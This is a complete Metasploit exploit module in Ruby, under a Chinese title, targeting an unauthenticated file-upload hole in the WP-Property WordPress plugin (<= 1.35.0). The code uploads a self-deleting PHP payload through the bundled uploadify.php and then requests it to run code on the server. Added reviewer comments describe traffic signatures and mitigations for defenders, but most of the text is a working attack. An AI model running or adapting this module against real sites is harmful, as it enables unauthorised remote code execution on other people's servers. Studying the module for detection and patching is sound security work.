WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

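# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description), reached through the
# uploadify.php script bundled with the plugin.
#
# Reviewer notes for defenders:
# * Traffic produced by this module: a GET and a multipart POST to
#   <wordpress>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   with the form fields "Filedata" and "folder", followed by a GET for a
#   five-letter ".php" file name.
# * Mitigation: run a plugin release newer than 1.35.0, remove or block the
#   bundled uploadify.php, and deny PHP execution in directories the web server
#   can write to.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, targets, payload constraints)
  # and the TARGETURI option that locates the WordPress installation.
  #
  # @param info [Hash] metadata passed in by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the bundled uploadify.php script.
  #
  # NOTE(review): this is a reachability test only. An HTTP 200 shows the
  # script is served; it does not establish the plugin version or that an
  # upload would be accepted, so "Appears" can be a false positive. Every other
  # outcome (no response, non-200) maps to "Unknown", never to "Safe".
  #
  # @return [Exploit::CheckCode] Appears on HTTP 200, Unknown otherwise
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a PHP stub through uploadify.php and then requests it.
  #
  # Fails with UnexpectedReply when the upload response is missing, is not an
  # HTTP 200, or does not mention the generated file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # :unlink_self requests a stub that removes itself after it has run, so the
    # uploaded file may not remain on disk afterwards; web server access logs
    # are the more durable evidence of this request sequence.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF in front of a boundary marker that sits at the start of a
    # line (presumably to normalise the leading boundary; confirm against Rex).
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The file name is interpolated into the pattern unescaped, so its "."
    # matches any character.
    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the request path for the uploaded
    # file; nothing here validates what the server returned.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end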
不要问我这写的是什么 怎么利用 我是说msf.